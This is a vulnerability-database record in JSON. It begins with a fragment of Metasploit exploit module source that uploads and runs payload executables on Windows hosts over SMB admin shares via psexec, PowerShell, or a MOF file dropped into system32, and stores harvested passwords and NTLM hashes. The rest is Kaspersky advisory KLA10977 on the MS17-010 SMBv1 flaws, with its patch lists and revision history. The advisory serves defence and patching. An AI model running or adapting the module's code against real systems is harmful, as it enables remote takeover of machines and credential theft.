\nnative_upload \nwhen 'MOF upload' \nmof_upload \nend \n \nhandler \nend \n \n \n# TODO: Again, shamelessly copypasta from the psexec exploit module. Needs to \n# be moved into a mixin \n \ndef powershell_installed? 
\nshare = \"\\\\\\\\#{datastore['RHOST']}\\\\#{datastore['SHARE']}\" \n \ncase datastore['SHARE'].upcase \nwhen 'ADMIN$' \npath = 'System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe' \nwhen 'C$' \npath = 'Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe' \nelse \npath = datastore['PSH_PATH'] \nend \n \nsimple.connect(share) \n \nvprint_status(\"Checking for #{path}\") \n \nif smb_file_exist?(path) \nvprint_status('PowerShell found') \npsh = true \nelse \nvprint_status('PowerShell not found') \npsh = false \nend \n \nsimple.disconnect(share) \n \npsh \nend \n \ndef powershell \nENV['MSF_SERVICENAME'] = datastore['SERVICE_NAME'] \ncommand = cmd_psh_payload(payload.encoded, payload_instance.arch.first) \n \nif datastore['PSH::persist'] and not datastore['DisablePayloadHandler'] \nprint_warning(\"You probably want to DisablePayloadHandler and use exploit/multi/handler with the PSH::persist option\") \nend \n \n# Execute the powershell command \nprint_status(\"Executing the payload...\") \nbegin \npsexec(command) \nrescue StandardError => exec_command_error \nfail_with(Failure::Unknown, \"#{peer} - Unable to execute specified command: #{exec_command_error}\") \nend \nend \n \ndef native_upload \nfilename = datastore['SERVICE_FILENAME'] || \"#{rand_text_alpha(8)}.exe\" \nservicename = datastore['SERVICE_NAME'] || rand_text_alpha(8) \nserviceencoder = datastore['SERVICE_STUB_ENCODER'] || '' \n \n# Upload the shellcode to a file \nprint_status(\"Uploading payload...\") \nsmbshare = datastore['SHARE'] \nfileprefix = \"\" \n# if SHARE = Users/sasha/ or something like this \nif smbshare =~ /.[\\\\\\/]/ \nsubfolder = true \nsmbshare = datastore['SHARE'].dup \nsmbshare = smbshare.gsub(/^[\\\\\\/]/,\"\") \nfolder_list = smbshare.split(/[\\\\\\/]/) \nsmbshare = folder_list[0] \nfileprefix = folder_list[1..-1].map {|a| a + \"\\\\\"}.join.gsub(/\\\\$/,\"\") if folder_list.length > 1 \nsimple.connect(\"\\\\\\\\#{datastore['RHOST']}\\\\#{smbshare}\") \nfd = 
smb_open(\"\\\\#{fileprefix}\\\\#(unknown)\", 'rwct') \nelse \nsubfolder = false \nsimple.connect(\"\\\\\\\\#{datastore['RHOST']}\\\\#{smbshare}\") \nfd = smb_open(\"\\\\#(unknown)\", 'rwct') \nend \nexe = '' \nopts = { :servicename => servicename, :serviceencoder => serviceencoder} \nbegin \nexe = generate_payload_exe_service(opts) \n \nfd << exe \nensure \nfd.close \nend \n \nif subfolder \nprint_status(\"Created \\\\#{fileprefix}\\\\#(unknown)...\") \nelse \nprint_status(\"Created \\\\#(unknown)...\") \nend \n \n# Disconnect from the share \nsimple.disconnect(\"\\\\\\\\#{datastore['RHOST']}\\\\#{smbshare}\") \n \n# define the file location \nif datastore['SHARE'] == 'ADMIN$' \nfile_location = \"%SYSTEMROOT%\\\\#(unknown)\" \nelsif datastore['SHARE'] =~ /^[a-zA-Z]\\$$/ \nfile_location = datastore['SHARE'].slice(0,1) + \":\\\\#(unknown)\" \nelse \nfile_location = \"\\\\\\\\127.0.0.1\\\\#{smbshare}\\\\#{fileprefix}\\\\#(unknown)\" \nend \n \npsexec(file_location, false) \n \nunless datastore['SERVICE_PERSIST'] \nprint_status(\"Deleting \\\\#(unknown)...\") \n#This is not really useful but will prevent double \\\\ on the wire :) \nif datastore['SHARE'] =~ /.[\\\\\\/]/ \nsimple.connect(\"\\\\\\\\#{datastore['RHOST']}\\\\#{smbshare}\") \nbegin \nsimple.delete(\"\\\\#{fileprefix}\\\\#(unknown)\") \nrescue XCEPT::ErrorCode => e \nprint_error(\"Delete of \\\\#{fileprefix}\\\\#(unknown) failed: #{e.message}\") \nend \nelse \nsimple.connect(\"\\\\\\\\#{datastore['RHOST']}\\\\#{smbshare}\") \nbegin \nsimple.delete(\"\\\\#(unknown)\") \nrescue XCEPT::ErrorCode => e \nprint_error(\"Delete of \\\\#(unknown) failed: #{e.message}\") \nend \nend \nend \nend \n \ndef mof_upload \nshare = \"\\\\\\\\#{datastore['RHOST']}\\\\ADMIN$\" \nfilename = datastore['SERVICE_FILENAME'] || \"#{rand_text_alpha(8)}.exe\" \n \n# payload as exe \nprint_status(\"Trying wbemexec...\") \nprint_status(\"Uploading Payload...\") \nif datastore['SHARE'] != 'ADMIN$' \nprint_error('Wbem will 
only work with ADMIN$ share') \nreturn \nend \nsimple.connect(share) \nexe = generate_payload_exe \nfd = smb_open(\"\\\\system32\\\\#(unknown)\", 'rwct') \nfd << exe \nfd.close \nprint_status(\"Created %SystemRoot%\\\\system32\\\\#(unknown)\") \n \n# mof to cause execution of above \nmofname = rand_text_alphanumeric(14) + \".MOF\" \nmof = generate_mof(mofname, filename) \nprint_status(\"Uploading MOF...\") \nfd = smb_open(\"\\\\system32\\\\wbem\\\\mof\\\\#{mofname}\", 'rwct') \nfd << mof \nfd.close \nprint_status(\"Created %SystemRoot%\\\\system32\\\\wbem\\\\mof\\\\#{mofname}\") \n \n# Disconnect from the ADMIN$ \nsimple.disconnect(share) \nend \n \ndef report_auth \nservice_data = { \naddress: ::Rex::Socket.getaddress(datastore['RHOST'],true), \nport: datastore['RPORT'], \nservice_name: 'smb', \nprotocol: 'tcp', \nworkspace_id: myworkspace_id \n} \n \ncredential_data = { \norigin_type: :service, \nmodule_fullname: self.fullname, \nprivate_data: datastore['SMBPass'], \nusername: datastore['SMBUser'].downcase \n} \n \nif datastore['SMBDomain'] and datastore['SMBDomain'] != 'WORKGROUP' \ncredential_data.merge!({ \nrealm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN, \nrealm_value: datastore['SMBDomain'] \n}) \nend \n \nif datastore['SMBPass'] =~ /[0-9a-fA-F]{32}:[0-9a-fA-F]{32}/ \ncredential_data.merge!({:private_type => :ntlm_hash}) \nelse \ncredential_data.merge!({:private_type => :password}) \nend \n \ncredential_data.merge!(service_data) \n \ncredential_core = create_credential(credential_data) \n \nlogin_data = { \naccess_level: 'Admin', \ncore: credential_core, \nlast_attempted_at: DateTime.now, \nstatus: Metasploit::Model::Login::Status::SUCCESSFUL \n} \n \nlogin_data.merge!(service_data) \ncreate_credential_login(login_data) \nend \nend \n`\n", "_object_type": "robots.models.packetstorm.PacketstormBulletin", "_object_types": ["robots.models.packetstorm.PacketstormBulletin", "robots.models.base.Bulletin"], "immutableFields": [], "cvss2": {}, 
"cvss3": {}}], "kaspersky": [{"id": "KLA10977", "hash": "3fbc1ad46e9debcf4080eda775c63524", "type": "kaspersky", "bulletinFamily": "info", "title": "KLA10977 Multiple vulnerabilities in Microsoft Server Message Block (SMB)", "description": "### *Detect date*:\n03/14/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft Server Message Block 1.0(SMBv1). Malicious users can exploit these vulnerabilities to execute arbitrary code or obtain sensitive information.\n\n### *Affected products*:\nMicrosoft Windows XP Service Pack 2 \nMicrosoft Windows XP Service Pack 3 \nMicrosoft Windows XP Embedded Service Pack 3 \nMicrosoft Windows Vista Service Pack 2 \nMicrosoft Windows 7 Service Pack 1 \nMicrosoft Windows 8 \nMicrosoft Windows 8.1 \nMicrosoft Windows RT 8.1 \nMicrosoft Windows 10 \nMicrosoft Windows Server 2003 Service Pack 2 \nMicrosoft Windows Server 2008 Service Pack 2 \nMicrosoft Windows Server 2008 R2 Service Pack 1 \nMicrosoft Windows Server 2012 \nMicrosoft Windows Server 2012 R2 \nMicrosoft Windows Server 2016\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[Customer Guidance for WannaCrypt attacks](<https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/>) \n[Securelist](<https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/>) \n[MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) \n[CVE-2017-0143](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143>) \n[CVE-2017-0144](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144>) \n[CVE-2017-0145](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0145>) 
\n[CVE-2017-0146](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0146>) \n[CVE-2017-0147](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0147>) \n[CVE-2017-0148](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0148>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows Vista](<https://threats.kaspersky.com/en/product/Microsoft-Windows-Vista-4/>)\n\n### *CVE-IDS*:\n[CVE-2017-0143](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143>)9.3Critical \n[CVE-2017-0144](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144>)9.3Critical \n[CVE-2017-0145](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>)9.3Critical \n[CVE-2017-0146](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146>)9.3Critical \n[CVE-2017-0147](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147>)4.3Warning \n[CVE-2017-0148](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148>)9.3Critical\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4012217](<http://support.microsoft.com/kb/4012217>) \n[4012215](<http://support.microsoft.com/kb/4012215>) \n[4012216](<http://support.microsoft.com/kb/4012216>) \n[4012606](<http://support.microsoft.com/kb/4012606>) \n[4013198](<http://support.microsoft.com/kb/4013198>) \n[4013429](<http://support.microsoft.com/kb/4013429>) \n[4012212](<http://support.microsoft.com/kb/4012212>) \n[4012214](<http://support.microsoft.com/kb/4012214>) \n[4012213](<http://support.microsoft.com/kb/4012213>) \n[4012598](<http://support.microsoft.com/kb/4012598>)\n\n### *Exploitation*:\nThis vulnerability can be exploited by the following malware:", "published": "2017-03-14T00:00:00", "modified": "2021-04-22T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": 
"COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://threats.kaspersky.com/en/vulnerability/KLA10977/", "reporter": "Kaspersky Lab", "references": ["https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/", "https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/", "https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/", "https://technet.microsoft.com/en-us/library/security/ms17-010.aspx", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0145", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0146", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0147", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0148", "https://threats.kaspersky.com/en/product/Microsoft-Windows-Vista-4/", "https://threats.kaspersky.com/en/product/Microsoft-Windows-Server-2012/", "https://threats.kaspersky.com/en/product/Microsoft-Windows-8/", 
"https://threats.kaspersky.com/en/product/Microsoft-Windows-7/", "https://threats.kaspersky.com/en/product/Microsoft-Windows-Server-2008/", "https://threats.kaspersky.com/en/product/Microsoft-Windows-Server-2003/", "https://threats.kaspersky.com/en/product/Windows-RT/", "https://threats.kaspersky.com/en/product/Microsoft-Windows-XP/", "https://threats.kaspersky.com/en/product/Microsoft-Windows-10/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://portal.msrc.microsoft.com/en-us/security-guidance", "http://support.microsoft.com/kb/4012217", "http://support.microsoft.com/kb/4012215", "http://support.microsoft.com/kb/4012216", "http://support.microsoft.com/kb/4012606", "http://support.microsoft.com/kb/4013198", "http://support.microsoft.com/kb/4013429", "http://support.microsoft.com/kb/4012212", "http://support.microsoft.com/kb/4012214", "http://support.microsoft.com/kb/4012213", "http://support.microsoft.com/kb/4012598", "https://threats.kaspersky.com/en/threat/Intrusion.Win.EternalRomance/", "https://threats.kaspersky.com/en/threat/Intrusion.Win.CVE-2017-0147.sa.leak/", "https://www.exploit-db.com/exploits/43970", "https://www.exploit-db.com/exploits/41891", "https://www.exploit-db.com/exploits/42031", "https://www.exploit-db.com/exploits/42030", "https://www.exploit-db.com/exploits/41987", "https://threats.kaspersky.com/en/threat/Intrusion.Win.EternalRomance/", "https://www.exploit-db.com/exploits/43970", "https://www.exploit-db.com/exploits/43970", "https://threats.kaspersky.com/en/threat/Intrusion.Win.CVE-2017-0147.sa.leak/", "https://www.exploit-db.com/exploits/41987", 
"https://statistics.securelist.com/vulnerability-scan/month"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-08-18T11:18:34", "history": [{"bulletin": {"id": "KLA10977", "hash": "85e14e3fbb5015475388d9280c28862a3e56beadd857352871dc4dd746f64323", "type": "kaspersky", "bulletinFamily": "info", "title": "\r KLA10977\nMultiple vulnerabilities in Microsoft Server Message Block (SMB)\t\t\t ", "description": "### *CVSS*:\n8.5\n\n### *Detect date*:\n03/13/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft Server Message Block 1.0(SMBv1). Malicious users can exploit these vulnerabilities to execute arbitrary code or obtain sensitive information.\n\n### *Affected products*:\nMicrosoft Windows XP Service Pack 2 \nMicrosoft Windows XP Service Pack 3 \nMicrosoft Windows XP Embedded Service Pack 3 \nMicrosoft Windows Vista Service Pack 2 \nMicrosoft Windows 7 Service Pack 1 \nMicrosoft Windows 8 \nMicrosoft Windows 8.1 \nMicrosoft Windows RT 8.1 \nMicrosoft Windows 10 \nMicrosoft Windows Server 2003 Service Pack 2 \nMicrosoft Windows Server 2008 Service Pack 2 \nMicrosoft Windows Server 2008 R2 Service Pack 1 \nMicrosoft Windows Server 2012 \nMicrosoft Windows Server 2012 R2 \nMicrosoft Windows Server 2016\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[MS17-010](<https://technet.microsoft.com/en-us/library/security/MS17-010>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Windows RT](<https://threats.kaspersky.com/en/product/Windows-RT-2/>)\n\n### *CVE-IDS*:\n[CVE-2017-0148](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148>) \n[CVE-2017-0147](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147>) 
\n[CVE-2017-0146](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146>) \n[CVE-2017-0145](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>) \n[CVE-2017-0144](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144>) \n[CVE-2017-0143](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143>) \n\n\n### *MS list*:\n[MS17-010](<https://technet.microsoft.com/en-us/library/security/MS17-010>)\n\n### *KB list*:\n[4012606](<http://support.microsoft.com/kb/4012606>) \n[4012216](<http://support.microsoft.com/kb/4012216>) \n[4012217](<http://support.microsoft.com/kb/4012217>) \n[4013198](<http://support.microsoft.com/kb/4013198>) \n[4012215](<http://support.microsoft.com/kb/4012215>) \n[4013429](<http://support.microsoft.com/kb/4013429>) \n[4012598](<http://support.microsoft.com/kb/4012598>) \n[4012212](<http://support.microsoft.com/kb/4012212>) \n[4012214](<http://support.microsoft.com/kb/4012214>) \n[4012213](<http://support.microsoft.com/kb/4012213>)", "published": "2017-03-13T00:00:00", "modified": "2017-05-22T00:00:00", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "href": "https://threats.kaspersky.com/en/vulnerability/KLA10977", "reporter": "Kaspersky Lab", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2017-10-18T12:46:00", "history": [], "viewCount": 67, "enchantments": {}, "objectVersion": "1.6"}, "lastseen": "2017-10-18T12:46:00", "differentElements": ["cvss", "description", "published", "title"], "edition": 1}, {"bulletin": {"id": "KLA10977", "hash": "85b4da5fc7b48e994fed8ca4e288208b71e5b1a1a4ac153424a8aa3c728386c8", "type": "kaspersky", "bulletinFamily": "info", "title": "\r KLA10977Multiple vulnerabilities in Microsoft Server Message Block (SMB)\t\t\t ", "description": "### *CVSS*:\n9.3\n\n### *Detect date*:\n03/14/2017\n\n### 
*Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft Server Message Block 1.0(SMBv1). Malicious users can exploit these vulnerabilities to execute arbitrary code or obtain sensitive information.\n\n### *Affected products*:\nMicrosoft Windows XP Service Pack 2 \nMicrosoft Windows XP Service Pack 3 \nMicrosoft Windows XP Embedded Service Pack 3 \nMicrosoft Windows Vista Service Pack 2 \nMicrosoft Windows 7 Service Pack 1 \nMicrosoft Windows 8 \nMicrosoft Windows 8.1 \nMicrosoft Windows RT 8.1 \nMicrosoft Windows 10 \nMicrosoft Windows Server 2003 Service Pack 2 \nMicrosoft Windows Server 2008 Service Pack 2 \nMicrosoft Windows Server 2008 R2 Service Pack 1 \nMicrosoft Windows Server 2012 \nMicrosoft Windows Server 2012 R2 \nMicrosoft Windows Server 2016\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[MS17-010](<https://technet.microsoft.com/en-us/library/security/MS17-010>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Windows RT](<https://threats.kaspersky.com/en/product/Windows-RT-2/>)\n\n### *CVE-IDS*:\n[CVE-2017-0148](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148>) \n[CVE-2017-0147](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147>) \n[CVE-2017-0146](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146>) \n[CVE-2017-0145](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>) \n[CVE-2017-0144](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144>) \n[CVE-2017-0143](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143>) \n\n\n### *Microsoft official advisories*:\n[MS17-010](<https://technet.microsoft.com/en-us/library/security/MS17-010>)\n\n### *KB list*:\n[4012606](<http://support.microsoft.com/kb/4012606>) \n[4012216](<http://support.microsoft.com/kb/4012216>) 
\n[4012217](<http://support.microsoft.com/kb/4012217>) \n[4013198](<http://support.microsoft.com/kb/4013198>) \n[4012215](<http://support.microsoft.com/kb/4012215>) \n[4013429](<http://support.microsoft.com/kb/4013429>) \n[4012598](<http://support.microsoft.com/kb/4012598>) \n[4012212](<http://support.microsoft.com/kb/4012212>) \n[4012214](<http://support.microsoft.com/kb/4012214>) \n[4012213](<http://support.microsoft.com/kb/4012213>)", "published": "2017-03-14T00:00:00", "modified": "2017-05-22T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "href": "https://threats.kaspersky.com/en/vulnerability/KLA10977", "reporter": "Kaspersky Lab", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2018-02-19T21:28:25", "history": [], "viewCount": 93, "enchantments": {"score": {"modified": "2018-02-19T21:28:25", "value": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N/"}}, "objectVersion": "1.6"}, "lastseen": "2018-02-19T21:28:25", "differentElements": ["description", "modified", "title"], "edition": 2}, {"bulletin": {"id": "KLA10977", "hash": "973d607f9b9da5ee68bff11c96c3a9167b88127fdc37956f7ba2486b2b128658", "type": "kaspersky", "bulletinFamily": "info", "title": "\r KLA10977Multiple vulnerabilities in Microsoft Server Message Block (SMB) ", "description": "### *CVSS*:\n9.3\n\n### *Detect date*:\n03/14/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft Server Message Block 1.0(SMBv1). 
Malicious users can exploit these vulnerabilities to execute arbitrary code or obtain sensitive information.\n\n### *Affected products*:\nMicrosoft Windows XP Service Pack 2 \nMicrosoft Windows XP Service Pack 3 \nMicrosoft Windows XP Embedded Service Pack 3 \nMicrosoft Windows Vista Service Pack 2 \nMicrosoft Windows 7 Service Pack 1 \nMicrosoft Windows 8 \nMicrosoft Windows 8.1 \nMicrosoft Windows RT 8.1 \nMicrosoft Windows 10 \nMicrosoft Windows Server 2003 Service Pack 2 \nMicrosoft Windows Server 2008 Service Pack 2 \nMicrosoft Windows Server 2008 R2 Service Pack 1 \nMicrosoft Windows Server 2012 \nMicrosoft Windows Server 2012 R2 \nMicrosoft Windows Server 2016\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[Customer Guidance for WannaCrypt attacks](<https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/>) \n[Securelist](<https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/>) \n[MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) \n[CVE-2017-0143](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143>) \n[CVE-2017-0144](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144>) \n[CVE-2017-0145](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0145>) \n[CVE-2017-0146](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0146>) \n[CVE-2017-0147](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0147>) \n[CVE-2017-0148](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0148>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows Vista](<https://threats.kaspersky.com/en/product/Microsoft-Windows-Vista-4/>)\n\n### 
*CVE-IDS*:\n[CVE-2017-0143](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143>) \n[CVE-2017-0144](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144>) \n[CVE-2017-0145](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>) \n[CVE-2017-0146](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146>) \n[CVE-2017-0147](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147>) \n[CVE-2017-0148](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148>) \n\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4012217](<http://support.microsoft.com/kb/4012217>) \n[4012215](<http://support.microsoft.com/kb/4012215>) \n[4012216](<http://support.microsoft.com/kb/4012216>) \n[4012606](<http://support.microsoft.com/kb/4012606>) \n[4013198](<http://support.microsoft.com/kb/4013198>) \n[4013429](<http://support.microsoft.com/kb/4013429>) \n[4012212](<http://support.microsoft.com/kb/4012212>) \n[4012214](<http://support.microsoft.com/kb/4012214>) \n[4012213](<http://support.microsoft.com/kb/4012213>) \n[4012598](<http://support.microsoft.com/kb/4012598>)", "published": "2017-03-14T00:00:00", "modified": "2018-09-26T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "href": "https://threats.kaspersky.com/en/vulnerability/KLA10977", "reporter": "Kaspersky Lab", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2018-09-27T11:50:58", "history": [], "viewCount": 359, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.6"}, "lastseen": "2018-09-27T11:50:58", "differentElements": ["modified"], "edition": 3}, {"bulletin": {"id": "KLA10977", "hash": "09cf9d65e506641f7a5a91eadd8a921e897a3a2064f415543abcf12f1fb8ef49", "type": "kaspersky", "bulletinFamily": "info", "title": "\r KLA10977Multiple 
vulnerabilities in Microsoft Server Message Block (SMB) ", "description": "### *CVSS*:\n9.3\n\n### *Detect date*:\n03/14/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft Server Message Block 1.0(SMBv1). Malicious users can exploit these vulnerabilities to execute arbitrary code or obtain sensitive information.\n\n### *Affected products*:\nMicrosoft Windows XP Service Pack 2 \nMicrosoft Windows XP Service Pack 3 \nMicrosoft Windows XP Embedded Service Pack 3 \nMicrosoft Windows Vista Service Pack 2 \nMicrosoft Windows 7 Service Pack 1 \nMicrosoft Windows 8 \nMicrosoft Windows 8.1 \nMicrosoft Windows RT 8.1 \nMicrosoft Windows 10 \nMicrosoft Windows Server 2003 Service Pack 2 \nMicrosoft Windows Server 2008 Service Pack 2 \nMicrosoft Windows Server 2008 R2 Service Pack 1 \nMicrosoft Windows Server 2012 \nMicrosoft Windows Server 2012 R2 \nMicrosoft Windows Server 2016\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[Customer Guidance for WannaCrypt attacks](<https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/>) \n[Securelist](<https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/>) \n[MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) \n[CVE-2017-0143](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143>) \n[CVE-2017-0144](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144>) \n[CVE-2017-0145](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0145>) \n[CVE-2017-0146](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0146>) 
